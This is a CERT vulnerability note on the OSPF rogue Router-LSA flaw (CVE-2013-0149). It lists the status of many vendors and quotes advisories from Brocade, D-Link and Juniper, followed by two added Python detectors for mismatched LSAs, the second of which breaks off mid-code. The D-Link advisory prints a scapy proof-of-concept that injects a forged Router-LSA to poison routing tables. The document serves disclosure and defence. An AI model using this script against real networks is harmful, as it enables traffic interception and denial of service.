ACCESS Unknown

Notified:  May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

    ACME Packet Not Affected

    Notified:  May 28, 2013 Updated: July 18, 2013

    Status

    Not Affected

    Vendor Statement

    No statement is currently available from the vendor regarding this vulnerability.

    Vendor Information

    We are not aware of further vendor information regarding this vulnerability.

    Alcatel-Lucent Unknown

    Notified:  May 10, 2013 Updated: May 10, 2013

    Status

    Unknown

    Vendor Statement

    No statement is currently available from the vendor regarding this vulnerability.

    Vendor References

      Apple Inc. Unknown

      Notified:  May 28, 2013 Updated: May 28, 2013

      Status

      Unknown

      Vendor Statement

      No statement is currently available from the vendor regarding this vulnerability.

      Vendor References

        AT&T Unknown

        Notified:  June 06, 2013 Updated: June 06, 2013

        Status

        Unknown

        Vendor Statement

        No statement is currently available from the vendor regarding this vulnerability.

        Vendor References

          Avaya, Inc. Unknown

          Notified:  May 28, 2013 Updated: May 28, 2013

          Status

          Unknown

          Vendor Statement

          No statement is currently available from the vendor regarding this vulnerability.

          Vendor References

            Barracuda Networks Unknown

            Notified:  May 28, 2013 Updated: May 28, 2013

            Status

            Unknown

            Vendor Statement

            No statement is currently available from the vendor regarding this vulnerability.

            Vendor References

              Belkin, Inc. Unknown

              Notified:  May 28, 2013 Updated: May 28, 2013

              Status

              Unknown

              Vendor Statement

              No statement is currently available from the vendor regarding this vulnerability.

              Vendor References

                Blue Coat Systems Unknown

                Notified:  June 06, 2013 Updated: June 06, 2013

                Status

                Unknown

                Vendor Statement

                No statement is currently available from the vendor regarding this vulnerability.

                Vendor References

                  Borderware Technologies Unknown

                  Notified:  May 28, 2013 Updated: May 28, 2013

                  Status

                  Unknown

                  Vendor Statement

                  No statement is currently available from the vendor regarding this vulnerability.

                  Vendor References

                    Brocade Affected

                    Notified:  June 13, 2013 Updated: August 05, 2013

                    Status

                    Affected

                    Vendor Statement

TECHNICAL SUPPORT BULLETIN
July 25, 2013
TSB 2013-165-A
SEVERITY: Low – Informational

PRODUCTS AFFECTED:
- Brocade MLX Series running NetIron SW
- Brocade NetIron XMR Series running NetIron SW
- Brocade NetIron CER Series running NetIron SW
- Brocade NetIron CES Series running NetIron SW
- Brocade VDX Series running Network OS 3.x and later SW
- Brocade FastIron Series running FastIron SW
- Brocade ICX Series running FastIron SW
- Brocade TurboIron Series running FastIron or TurboIron SW
- Brocade BigIron RX Series running BigIron RX SW
- Brocade ADX Series and JetCore Series running ServerIron SW
- Brocade Vyatta vRouter

CORRECTED IN RELEASE: See list of releases below.

BULLETIN OVERVIEW
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as CVE-2013-0149. See http://nvd.nist.gov/home.cfm for details. Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that have a direct, entitled, support relationship in place with Brocade. Please contact your primary service provider for further information regarding this topic and applicability for your environment.

PROBLEM STATEMENT
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This vulnerability requires that the attacker already controls a router within the AS.

RISK ASSESSMENT
The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already has control of a router in the AS. This vulnerability has a CVSS score of 9.3.

SYMPTOMS
An attacker who has gained control of a router within a given AS can arbitrarily poison the routing tables of all other routers in the AS. This can facilitate traffic subversion, black holes, etc. The attacker can cause attacks through a crafted illegal OSPF router LSA (type-1), where the link state ID and router ID in the LSA are not the same, leading to corruption of the routing table in the routers. The crafted Router LSA must come from a source IP of an OSPF peer (in other words, spoofing a legitimate OSPF peer), or the router LSA is sent on an interface where an OSPF peer already exists.

WORKAROUND
There is no workaround. However, if users can physically secure their network/routers, the chance of this attack is quite low. The recommendations are:
a) Physically secure the access to network routers, and links between routers.
b) Only allow passive OSPF protocols on interfaces with user/host connections (i.e. leaf interfaces).
c) Enable OSPF MD5 authentication. This is not considered completely secure, but it should make the attack more difficult.

CORRECTIVE ACTION
See http://My.Brocade.com for the appropriate SW release(s) as listed below; please contact your account team or Brocade Support if you have further questions.

Affected Products: Brocade MLX Series, Brocade NetIron XMR Series, Brocade NetIron CER Series, Brocade NetIron CES Series
SW Releases with problem resolved: NetIron 05.2.00k and later; NetIron 05.3.00f and later; NetIron 05.4.00e and later; NetIron 05.5.00d and later
Reference Defect ID: 468326

Affected Products: Brocade VDX Series
SW Releases with problem resolved: Network OS 3.0.1c and later; Network OS 4.0.0a and later
Reference Defect ID: 466022

Affected Products: Brocade FastIron Series, Brocade ICX Series, Brocade TurboIron Series
SW Releases with problem resolved: FastIron 7.2.02k and later; FastIron 7.3.00g and later; FastIron 07.4.00d and later; FastIron 08.0.00b and later
Reference Defect ID: 466801

Affected Products: Brocade BigIron RX Series
SW Releases with problem resolved: BigIron RX 2.7.02p and later; BigIron RX 02.8.00f and later; BigIron RX 02.9.00c and later
Reference Defect ID: 468497

Affected Products: Brocade ADX Series and JetCore Series
SW Releases with problem resolved: ServerIron JetCore 10.2.02d; ServerIron JetCore 11.0.00k; ServerIron ADX 12.3.01k; ServerIron ADX 12.4.00k; ServerIron ADX 12.5.01a
Reference Defect ID (ADX): 469347
Reference Defect ID (JetCore): 111372

Affected Products: Brocade Vyatta vRouter
For customers running on Amazon Web Services this problem has been resolved.
SW Releases with problem resolved: Brocade Vyatta vRouter 6.6R1

                    Vendor Information

                    We are not aware of further vendor information regarding this vulnerability.

                    Buffalo Inc Not Affected

                    Notified:  May 30, 2013 Updated: September 12, 2013

                    Status

                    Not Affected

                    Vendor Statement

                    No statement is currently available from the vendor regarding this vulnerability.

                    Vendor Information

                    We are not aware of further vendor information regarding this vulnerability.

                    CA Technologies Unknown

                    Notified:  May 28, 2013 Updated: May 28, 2013

                    Status

                    Unknown

                    Vendor Statement

                    No statement is currently available from the vendor regarding this vulnerability.

                    Vendor References

                      Charlotte's Web Networks Unknown

                      Notified:  May 28, 2013 Updated: May 28, 2013

                      Status

                      Unknown

                      Vendor Statement

                      No statement is currently available from the vendor regarding this vulnerability.

                      Vendor References

                        Check Point Software Technologies Affected

                        Notified:  May 28, 2013 Updated: October 16, 2013

                        Status

                        Affected

                        Vendor Statement

                        No statement is currently available from the vendor regarding this vulnerability.

                        Vendor Information

                        We are not aware of further vendor information regarding this vulnerability.

                        Vendor References

                        Cisco Systems, Inc. Affected

                        Notified:  May 22, 2013 Updated: August 05, 2013

                        Status

                        Affected

                        Vendor Statement

                        No statement is currently available from the vendor regarding this vulnerability.

                        Vendor Information

Cisco has provided patches for this vulnerability; please check the URL below for details.

                        Vendor References

                        Computer Emergency Response Team Australia Unknown

                        Notified:  May 30, 2013 Updated: May 30, 2013

                        Status

                        Unknown

                        Vendor Statement

                        No statement is currently available from the vendor regarding this vulnerability.

                        Vendor References

                          Conectiva Inc. Unknown

                          Notified:  May 28, 2013 Updated: May 28, 2013

                          Status

                          Unknown

                          Vendor Statement

                          No statement is currently available from the vendor regarding this vulnerability.

                          Vendor References

                            Cray Inc. Unknown

                            Notified:  May 28, 2013 Updated: May 28, 2013

                            Status

                            Unknown

                            Vendor Statement

                            No statement is currently available from the vendor regarding this vulnerability.

                            Vendor References

                              Debian GNU/Linux Unknown

                              Notified:  May 28, 2013 Updated: May 28, 2013

                              Status

                              Unknown

                              Vendor Statement

                              No statement is currently available from the vendor regarding this vulnerability.

                              Vendor References

                                Dell Computer Corporation, Inc. Unknown

                                Notified:  May 10, 2013 Updated: May 10, 2013

                                Status

                                Unknown

                                Vendor Statement

                                No statement is currently available from the vendor regarding this vulnerability.

                                Vendor References

                                  D-Link Systems, Inc. Affected

                                  Notified:  May 28, 2013 Updated: August 05, 2013

                                  Status

                                  Affected

                                  Vendor Statement

1. Advisory Information
Title: Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers
D-Link ID: DLINK-2013-VUL0213
Advisory URL: TBD prior to Aug. 1, 2013
Date published: August 1, 2013
Date of last update: 7/29/13 (will update on saving document)
Reported by: CERT
Release mode: Coordinated Release

2. Vulnerability Information
Class: CWE-694
Impact: Critical
Remotely Exploitable: Possible, but would require access via other product(s)
Locally Exploitable: Yes
CVE Name: CVE-2013-0149

3. Vulnerability Description
The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability can allow an attacker to re-route traffic through their own router, compromising the confidentiality of the data, or to conduct a Denial of Service attack against a router, dropping all traffic.

4. Vulnerable Packages
The following is the list of known affected devices and the associated firmware (confirmed by D-Link). This will be updated as needed if additional units are affected.
1. DES-3810-28 – R2.20.B017 (HW not available in the US)

5. Vendor Information, Solutions and Workarounds
D-Link distributes a number of devices which could potentially be affected by this vulnerability; chiefly, any L3 managed switch that supports OSPF has the possibility of being subject to this attack. D-Link is working to reduce the potential impact of this vulnerability, which is a result of an ambiguous standard. Currently we advise the following: As always, adhering to best practices will be the strongest defense against attacks. As long as your physical devices, networks, and protocols are secured, it will be very difficult for an attacker to insert a rogue LSA to initiate this type of attack.
First, this vulnerability does not defeat cryptographic (MD5) authentication; we recommend a strong MD5 authentication key as your best defense. We also recommend that administrators enable the OSPF passive interface feature to stop sending or receiving routing table updates on interfaces that do not participate in OSPF. Finally, we recommend that networks use MAC-based Access Control (MAC) to authenticate devices before they are able to communicate with the network. The MAC feature is a client-less design, so there is no need to install extra software on a user's computer, and it ensures that only devices on a whitelist will have access to the network. When used in conjunction with common security best practices, it can help to strongly limit the possible vectors of attack. D-Link is monitoring the situation for an update to the standard that can be implemented to protect potentially affected devices.

6. Credits
Dr. Gabi Nakibly - NEWRSC, Rafael - Advanced Defense Systems Ltd.
Eitan Menahem - Telekom Innovation Laboratories, Ben Gurion University
Ariel Waizel - Telekom Innovation Laboratories, Ben Gurion University
Prof. Yuval Elovici - Telekom Innovation Laboratories, Ben Gurion University
The publication of this advisory was not coordinated with the aforementioned.

7. Technical Description / Proof of Concept Code
7.1. OSPF "Fight Back" is triggered by LSAs with matching Router ID only, and so can be evaded by using a non-matching Router ID and Link State ID on a rogue LSA. Routing lookup uses only the Link State ID field, and so may, depending on implementation, result in selecting the rogue LSA before the valid LSA.

scapy proof of concept attack script:

    from scapy.all import *
    load_contrib("ospf")

    attacker_source_ip = "192.168.13.1"
    attacker_router_id = "192.168.18.1"
    victim_destination_ip = "192.168.13.3"
    victim_router_id = "192.168.37.3"
    false_adv_router = "192.168.27.11"
    seq_num = 0x80000004

    R3_FALSE_LSA = IP(src=attacker_source_ip, dst=victim_destination_ip) \
        /OSPF_Hdr(src=attacker_router_id) \
        /OSPF_LSUpd(lsalist=[
            OSPF_Router_LSA(options=0x22, type=1, id=victim_router_id, adrouter=false_adv_router, seq=seq_num, linklist=[
                OSPF_Link(id="192.168.37.7", data="192.168.37.3", type=2, metric=1),
                OSPF_Link(id="192.168.13.3", data="192.168.13.3", type=2, metric=1),
                OSPF_Link(id="192.168.50.0", data="255.255.255.0", type=3, metric=3)
            ])
        ])
    send(R3_FALSE_LSA, iface="eth0")

8. Report Timeline
• May 28, 2013 – Notification by CERT of the issue
• May 28, 2013 – Notify qualified D-Link resources of issue
• June 6, 2013 – CERT notified embargo date changed to July 30
• June 6, 2013 – D-Link requests CERT to resend details
• June 11, 2013 – D-Link receives details
• July 29, 2013 – CERT notified embargo date changed to Aug 1
• July 29, 2013 – D-Link sends Vulnerability Response Report to CERT
• July 30, 2013 – D-Link posts report for affected products

9. References
[1] CVE-229804-2013.pdf – Owning the Routing Table Part II

10. About D-Link
D-Link is the global leader in connectivity for home, small business, mid- to large-sized enterprise environments, and service providers. An award-winning designer, developer, and manufacturer, D-Link implements and supports unified network solutions that integrate capabilities in switching, wireless, broadband, storage, IP Surveillance, and cloud-based network management. For more information visit www.dlink.com, or connect with D-Link on Facebook (www.facebook.com/dlink) and Twitter (www.twitter.com/dlink).

11. Disclaimer
D-Link and the D-Link logo are trademarks or registered trademarks of D-Link Corporation or its subsidiaries. All other third-party marks mentioned herein may be trademarks of their respective owners. Copyright © 2013. D-Link. All Rights Reserved.

References
Authors:
Patrick Cline - Patrick.Cline@dlink.com
William Brown – William.Brown@dlink.com

                                  Vendor Information

                                  Please see DLINK-2013-VUL0213.
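Added here as a defender-side check, not part of the CERT note or of any vendor statement: it parses the LSA headers in an OSPFv2 LS Update body and flags Router-LSAs whose Link State ID differs from their Advertising Router, the identifier mismatch that both the Brocade bulletin and the D-Link advisory above describe. The packet bytes are constructed inline for the example (they reuse the advisory's sample addresses, with the LSA checksum left at zero); the function and type names are the editor's own.

```python
import struct
from dataclasses import dataclass
from typing import List, Tuple

# OSPFv2 LSA header (RFC 2328, A.4.1): LS age, Options, LS type, Link State ID,
# Advertising Router, LS sequence number, LS checksum, length (20 bytes).
LSA_HDR = struct.Struct("!HBBIIIHH")
ROUTER_LSA = 1  # LS type 1


def ip_to_int(addr: str) -> int:
    a, b, c, d = (int(x) for x in addr.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d


def int_to_ip(n: int) -> str:
    return ".".join(str((n >> s) & 0xFF) for s in (24, 16, 8, 0))


@dataclass
class LSAHeader:
    ls_type: int
    ls_id: str
    adv_router: str
    seq: int
    length: int


def parse_ls_update_body(body: bytes) -> List[LSAHeader]:
    """Walk the LSAs in an OSPFv2 LS Update body (the bytes after the 24-byte OSPF header).

    Rejects truncated input instead of reading past the buffer, since a parser that
    trusts the LSA length field is itself a DoS target.
    """
    if len(body) < 4:
        raise ValueError("LS Update body shorter than the LSA count field")
    (count,) = struct.unpack_from("!I", body, 0)
    off, lsas = 4, []
    for _ in range(count):
        if off + LSA_HDR.size > len(body):
            raise ValueError("truncated LSA header")
        _age, _opts, ls_type, ls_id, adv, seq, _csum, length = LSA_HDR.unpack_from(body, off)
        if length < LSA_HDR.size or off + length > len(body):
            raise ValueError("LSA length field inconsistent with packet size")
        lsas.append(LSAHeader(ls_type, int_to_ip(ls_id), int_to_ip(adv), seq, length))
        off += length
    return lsas


def mismatched_router_lsas(lsas: List[LSAHeader]) -> List[LSAHeader]:
    """A well-formed Router-LSA carries its own Router ID in both the Link State ID
    and Advertising Router fields (RFC 2328, 12.4.1). Any Router-LSA where the two
    differ has the shape of the rogue LSA in this note and is worth alerting on."""
    return [l for l in lsas if l.ls_type == ROUTER_LSA and l.ls_id != l.adv_router]


# --- constructed sample data; not a capture from any real network -------------

def build_router_lsa(ls_id: str, adv: str, seq: int,
                     links: List[Tuple[str, str, int, int]]) -> bytes:
    """Serialize a Router-LSA (header + flags/link count + 12-byte link entries).
    The Fletcher checksum is left at zero: only the header identifiers matter here."""
    body = struct.pack("!BBH", 0, 0, len(links))
    for link_id, link_data, link_type, metric in links:
        body += struct.pack("!IIBBH", ip_to_int(link_id), ip_to_int(link_data),
                            link_type, 0, metric)
    length = LSA_HDR.size + len(body)
    hdr = LSA_HDR.pack(1, 0x22, ROUTER_LSA, ip_to_int(ls_id), ip_to_int(adv), seq, 0, length)
    return hdr + body


def build_ls_update_body(lsas: List[bytes]) -> bytes:
    return struct.pack("!I", len(lsas)) + b"".join(lsas)


# One legitimate Router-LSA from 192.168.37.3, and one with the identifier mismatch
# the advisories describe: same Link State ID, but a different Advertising Router.
LEGIT_LSA = build_router_lsa("192.168.37.3", "192.168.37.3", 0x80000003,
                             [("192.168.37.7", "192.168.37.3", 2, 1)])
ROGUE_LSA = build_router_lsa("192.168.37.3", "192.168.27.11", 0x80000004,
                             [("192.168.50.0", "255.255.255.0", 3, 3)])
SAMPLE_LS_UPDATE = build_ls_update_body([LEGIT_LSA, ROGUE_LSA])


def check_sample() -> List[str]:
    """Advertising Router of every mismatched Router-LSA in the constructed sample."""
    return [l.adv_router for l in mismatched_router_lsas(parse_ls_update_body(SAMPLE_LS_UPDATE))]


if __name__ == "__main__":
    for lsa in parse_ls_update_body(SAMPLE_LS_UPDATE):
        flag = "MISMATCH" if lsa.ls_id != lsa.adv_router else "ok"
        print(f"type={lsa.ls_type} ls_id={lsa.ls_id} adv={lsa.adv_router} "
              f"seq={lsa.seq:#x} len={lsa.length} {flag}")
```

The same check applied to a live feed (for example LS Update payloads pulled from a span port with a capture library) gives a low-noise alert, since the mismatch never occurs in conforming Router-LSAs.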

                                  DragonFly BSD Project Unknown

                                  Notified:  May 28, 2013 Updated: May 28, 2013

                                  Status

                                  Unknown

                                  Vendor Statement

                                  No statement is currently available from the vendor regarding this vulnerability.

                                  Vendor References

                                    EMC Corporation Unknown

                                    Notified:  May 28, 2013 Updated: May 28, 2013

                                    Status

                                    Unknown

                                    Vendor Statement

                                    No statement is currently available from the vendor regarding this vulnerability.

                                    Vendor References

                                      Engarde Secure Linux Unknown

                                      Notified:  May 28, 2013 Updated: May 28, 2013

                                      Status

                                      Unknown

                                      Vendor Statement

                                      No statement is currently available from the vendor regarding this vulnerability.

                                      Vendor References

                                        Enterasys Networks Affected

                                        Notified:  May 28, 2013 Updated: August 19, 2013

                                        Status

                                        Affected

                                        Vendor Statement

                                        Product Advisory Note - https://cp-enterasys.kb.net/article.aspx?article=15134&p=1

                                        Vendor Information

                                        We are not aware of further vendor information regarding this vulnerability.

                                        Vendor References

                                        Ericsson Unknown

                                        Notified:  June 06, 2013 Updated: June 06, 2013

                                        Status

                                        Unknown

                                        Vendor Statement

                                        No statement is currently available from the vendor regarding this vulnerability.

                                        Vendor References

                                          eSoft, Inc. Not Affected

                                          Notified:  May 28, 2013 Updated: July 30, 2013

                                          Status

                                          Not Affected

                                          Vendor Statement

                                          No statement is currently available from the vendor regarding this vulnerability.

                                          Vendor Information

                                          We are not aware of further vendor information regarding this vulnerability.

                                          Extreme Networks Affected

                                          Notified:  May 28, 2013 Updated: July 30, 2013

                                          Status

                                          Affected

                                          Vendor Statement

Extreme Networks' EXOS implementation of OSPF is susceptible to the vulnerability reported in VU#229804. This vulnerability will be fixed in a future EXOS release.

                                          Vendor Information

                                          We are not aware of further vendor information regarding this vulnerability.

                                          F5 Networks, Inc. Unknown

                                          Notified:  May 28, 2013 Updated: May 28, 2013

                                          Status

                                          Unknown

                                          Vendor Statement

                                          No statement is currently available from the vendor regarding this vulnerability.

                                          Vendor References

                                            Fedora Project Unknown

                                            Notified:  May 28, 2013 Updated: May 28, 2013

                                            Status

                                            Unknown

                                            Vendor Statement

                                            No statement is currently available from the vendor regarding this vulnerability.

                                            Vendor References

                                              Force10 Networks, Inc. Unknown

                                              Notified:  May 28, 2013 Updated: May 28, 2013

                                              Status

                                              Unknown

                                              Vendor Statement

                                              No statement is currently available from the vendor regarding this vulnerability.

                                              Vendor References

                                                Fortinet, Inc. Not Affected

                                                Notified:  May 28, 2013 Updated: August 19, 2013

                                                Status

                                                Not Affected

                                                Vendor Statement

                                                No statement is currently available from the vendor regarding this vulnerability.

                                                Vendor Information

                                                We are not aware of further vendor information regarding this vulnerability.

                                                FreeBSD Project Not Affected

                                                Notified:  May 28, 2013 Updated: July 18, 2013

                                                Status

                                                Not Affected

                                                Vendor Statement

                                                No statement is currently available from the vendor regarding this vulnerability.

                                                Vendor Information

                                                We are not aware of further vendor information regarding this vulnerability.

                                                Fujitsu Unknown

                                                Notified:  May 28, 2013 Updated: May 28, 2013

                                                Status

                                                Unknown

                                                Vendor Statement

                                                No statement is currently available from the vendor regarding this vulnerability.

                                                Vendor References

                                                  Gentoo Linux Unknown

                                                  Notified:  June 06, 2013 Updated: June 06, 2013

                                                  Status

                                                  Unknown

                                                  Vendor Statement

                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                  Vendor References

                                                    Global Technology Associates, Inc. Not Affected

                                                    Notified:  May 28, 2013 Updated: July 30, 2013

                                                    Statement Date:   July 30, 2013

                                                    Status

                                                    Not Affected

                                                    Vendor Statement

                                                    GTA's GB-OS based firewalls are not affected by this (VU#229804 - OSPF) vulnerability.

                                                    Vendor Information

                                                    We are not aware of further vendor information regarding this vulnerability.

                                                    Google Unknown

                                                    Notified:  May 28, 2013 Updated: May 28, 2013

                                                    Status

                                                    Unknown

                                                    Vendor Statement

                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                    Vendor References

                                                      Hewlett-Packard Company Unknown

                                                      Notified:  May 10, 2013 Updated: May 10, 2013

                                                      Status

                                                      Unknown

                                                      Vendor Statement

                                                      No statement is currently available from the vendor regarding this vulnerability.

                                                      Vendor References

                                                        Hitachi Not Affected

                                                        Notified:  May 28, 2013 Updated: July 31, 2013

                                                        Status

                                                        Not Affected

                                                        Vendor Statement

Hitachi Information for VU#229804: AlaxalA AX series (AX8600R/AX6000S/AX3800S/AX3600S/AX2500S/AX2200S/AX1200S/AX7800S/AX7800R) are not vulnerable to this issue.

                                                        Vendor Information

                                                        We are not aware of further vendor information regarding this vulnerability.

                                                        Huawei Technologies Not Affected

                                                        Notified:  May 10, 2013 Updated: August 22, 2013

                                                        Status

                                                        Not Affected

                                                        Vendor Statement

Huawei network devices are not affected by this (VU#229804 - OSPF) vulnerability.

                                                        Vendor Information

                                                        We are not aware of further vendor information regarding this vulnerability.

                                                        IBM Corporation Affected

                                                        Notified:  May 28, 2013 Updated: August 05, 2013

                                                        Status

                                                        Affected

                                                        Vendor Statement

                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                        Vendor Information

IBM has provided updates for multiple products; please check the URLs below for details.

                                                        Vendor References

                                                        IBM Corporation (zseries) Unknown

                                                        Notified:  May 28, 2013 Updated: May 28, 2013

                                                        Status

                                                        Unknown

                                                        Vendor Statement

                                                        No statement is currently available from the vendor regarding this vulnerability.

                                                        Vendor References

                                                          IBM eServer Unknown

                                                          Notified:  May 28, 2013 Updated: May 28, 2013

                                                          Status

                                                          Unknown

                                                          Vendor Statement

                                                          No statement is currently available from the vendor regarding this vulnerability.

                                                          Vendor References

                                                            Infoblox Unknown

                                                            Notified:  May 28, 2013 Updated: May 28, 2013

                                                            Status

                                                            Unknown

                                                            Vendor Statement

                                                            No statement is currently available from the vendor regarding this vulnerability.

                                                            Vendor References

                                                              Intel Corporation Not Affected

                                                              Notified:  May 22, 2013 Updated: July 18, 2013

                                                              Status

                                                              Not Affected

                                                              Vendor Statement

                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                              Vendor Information

                                                              We are not aware of further vendor information regarding this vulnerability.

                                                              Internet Security Systems, Inc. Unknown

                                                              Notified:  May 28, 2013 Updated: May 28, 2013

                                                              Status

                                                              Unknown

                                                              Vendor Statement

                                                              No statement is currently available from the vendor regarding this vulnerability.

                                                              Vendor References

                                                                Intoto Unknown

                                                                Notified:  May 28, 2013 Updated: May 28, 2013

                                                                Status

                                                                Unknown

                                                                Vendor Statement

                                                                No statement is currently available from the vendor regarding this vulnerability.

                                                                Vendor References

                                                                  IP Infusion, Inc. Unknown

                                                                  Notified:  May 28, 2013 Updated: May 28, 2013

                                                                  Status

                                                                  Unknown

                                                                  Vendor Statement

                                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                                  Vendor References

                                                                    Juniper Networks, Inc. Affected

                                                                    Notified:  May 10, 2013 Updated: December 03, 2013

                                                                    Status

                                                                    Affected

                                                                    Vendor Statement

                                                                    LEGACY ADVISORY ID: PSN-2013-08-987
                                                                    PRODUCT AFFECTED: All Juniper Networks platforms running Junos Operating System software, JunosE Operating System software, and ScreenOS software
                                                                    PROBLEM: A vulnerability has been discovered in the OSPF (Open Shortest Path First) protocol that allows a remote attacker to insert, update, or delete routes in the OSPF database. Juniper has worked to provide fixes for all supported code that is vulnerable to this issue. The issue lies in the OSPF protocol (RFC 2328: http://www.rfc-editor.org/rfc/rfc2328.txt). OSPF does not specify that the 'Link State ID' and 'Advertising Router' fields need to match when a router receives an OSPF link-state advertisement (LSA). This limitation of the protocol specification would allow an attacker to inject false routes into the OSPF database. This issue doesn't exist if the OSPF configuration of a router is set to use MD5 Authentication, or if a filter is used to block external parties from sending OSPF link-state update (LSU) packets. This issue also does not apply to passive OSPF interfaces or interfaces that are not configured for OSPF. This issue was discovered by an external security researcher. No other Juniper Networks products or platforms are affected by this issue. This issue has been assigned CVE-2013-0149.
                                                                    SOLUTION: Releases containing (or that will contain) the fix specifically include: 13.1R3, 13.2X50-D10, 12.3R3, 12.2R5, 12.1R7, 12.1X45-D10, 12.1X44-D15, 11.4R8, 10.4R15, and all subsequent releases. In addition, all Junos OS software releases built on or after 2013-07-25 will also have fixed this specific issue. Customers can confirm the build date of any Junos OS release by issuing the command 'show version detail'. All JunosE software releases built on or after 2013-07-25 have fixed this specific issue. Please contact JTAC to request a patch or hotfix for fixes on all other supported releases of code. Software updates to ScreenOS have been released to resolve this issue. Releases containing the fix include ScreenOS 5.4.0r28a, 6.2.0r17a, and 6.3.0r14a. This issue is being tracked as PR 878639 (Junos), CQ95773 (JunosE), and PR 895456 (ScreenOS). KB16765 - "In which releases are vulnerabilities fixed?" describes which release vulnerabilities are fixed as per our End of Engineering and End of Life support policies.
                                                                    WORKAROUND: Juniper recommends that customers use MD5 authentication when configuring OSPF. MD5 authentication completely mitigates this issue as the router will not accept an LSA without the correct MD5 auth value. It is good security practice to limit the exploitable attack surface of critical infrastructure networking equipment. Use access lists or firewall filters on physical interfaces (not loopback) to limit access to the router via OSPF unless necessary. Customers can request a hotfix for this issue on JunosE by contacting JTAC.
                                                                    IMPLEMENTATION:
                                                                    RELATED LINKS:
                                                                    KB16613: Overview of the Juniper Networks SIRT Monthly Security Bulletin Publication Process
                                                                    KB16765: In which releases are vulnerabilities fixed?
                                                                    KB16446: Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories.
                                                                    Report a Vulnerability - How to Contact the Juniper Networks Security Incident Response Team
                                                                    CVE-2013-0149
                                                                    CVSS SCORE: 7.8 (AV:N/AC:M/Au:N/C:N/I:P/A:C)
                                                                    RISK LEVEL: High
                                                                    RISK ASSESSMENT: This issue could allow a remote attacker the ability to modify an OSPF database. For the issue to take place the attacker would need to have unfiltered access to an OSPF interface that is not using MD5 authentication. The attacker would be able to add routes, overwrite routes, and also clear the OSPF database. This attack could potentially allow an attacker to cause a denial of service or reroute traffic.
                                                                    ACKNOWLEDGEMENTS: Juniper SIRT would like to acknowledge and thank Gabi Nakibly for responsibly reporting this vulnerability to CERT/CC who coordinated the multi-vendor response.

                                                                    Vendor Information

                                                                    We are not aware of further vendor information regarding this vulnerability.

                                                                    Vendor References
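
                                                                    The Juniper statement above names the condition (a router-LSA whose Link State ID and Advertising Router fields disagree) and the mitigation (cryptographic/MD5 authentication, or filtering LSU packets). The Python below is an added example, not Juniper's or CERT/CC's code: it parses the RFC 2328 OSPF packet header and LSA headers of a Link State Update, flags type-1 (router) LSAs whose two fields differ, and reports whether the packet carried cryptographic authentication (AuType 2). The packet bytes are constructed inline for offline use and carry no valid checksums or MD5 trailer; the function names are my own.

```python
"""Inspect OSPF Link State Update packets for the field mismatch described in
CVE-2013-0149 and report whether cryptographic authentication was in use.

Added example (not Juniper's or CERT/CC's code). Header layouts follow RFC 2328;
the sample packets are constructed here and have no valid checksums or MD5 data.
"""
import socket
import struct

OSPF_HDR_LEN = 24      # RFC 2328 A.3.1: 16 bytes of fields + 8 bytes authentication
LSA_HDR_LEN = 20       # RFC 2328 A.4.1
OSPF_TYPE_LSU = 4      # Link State Update
LS_TYPE_ROUTER = 1     # router-LSA: Link State ID must be the originator's Router ID
AUTYPE_CRYPTO = 2      # cryptographic authentication (MD5, RFC 2328 D.3)


def ip2str(n):
    return socket.inet_ntoa(struct.pack("!I", n))


def ip2int(s):
    return struct.unpack("!I", socket.inet_aton(s))[0]


def parse_ospf_header(pkt):
    """Decode the fixed OSPF packet header; the 8-byte authentication field is skipped."""
    if len(pkt) < OSPF_HDR_LEN:
        raise ValueError("truncated OSPF header")
    version, ptype, length, router_id, area_id, _csum, autype = struct.unpack("!BBHIIHH", pkt[:16])
    return {"version": version, "type": ptype, "length": length,
            "router_id": ip2str(router_id), "area_id": ip2str(area_id), "autype": autype}


def iter_lsas(body):
    """Yield LSA header dicts from an LSU body (the 4-byte LSA count comes first)."""
    count = struct.unpack("!I", body[:4])[0]
    off = 4
    for _ in range(count):
        hdr = body[off:off + LSA_HDR_LEN]
        if len(hdr) < LSA_HDR_LEN:
            raise ValueError("truncated LSA header")
        _age, _opts, ls_type, ls_id, adv_rtr, _seq, _csum, length = struct.unpack("!HBBIIIHH", hdr)
        if length < LSA_HDR_LEN:
            raise ValueError("bad LSA length")
        yield {"type": ls_type, "ls_id": ip2str(ls_id), "adv_rtr": ip2str(adv_rtr), "length": length}
        off += length  # LSA length covers header plus body, so this skips to the next LSA


def inspect_lsu(pkt):
    """Return which router-LSAs have Link State ID != Advertising Router and the auth mode."""
    hdr = parse_ospf_header(pkt)
    if hdr["type"] != OSPF_TYPE_LSU:
        return {"is_lsu": False, "src_router": hdr["router_id"]}
    body = pkt[OSPF_HDR_LEN:hdr["length"]]
    mismatched = [(lsa["ls_id"], lsa["adv_rtr"]) for lsa in iter_lsas(body)
                  if lsa["type"] == LS_TYPE_ROUTER and lsa["ls_id"] != lsa["adv_rtr"]]
    return {"is_lsu": True, "src_router": hdr["router_id"],
            "crypto_auth": hdr["autype"] == AUTYPE_CRYPTO, "mismatched": mismatched}


# --- constructed sample input (offline test data, not captured traffic) ---

def build_router_lsa(ls_id, adv_rtr):
    body = struct.pack("!BBH", 0, 0, 0)  # flags, reserved, zero links
    return struct.pack("!HBBIIIHH", 1, 0x22, LS_TYPE_ROUTER, ip2int(ls_id), ip2int(adv_rtr),
                       0x80000001, 0, LSA_HDR_LEN + len(body)) + body


def build_lsu(router_id, lsas, autype):
    body = struct.pack("!I", len(lsas)) + b"".join(lsas)
    hdr = struct.pack("!BBHIIHH", 2, OSPF_TYPE_LSU, OSPF_HDR_LEN + len(body),
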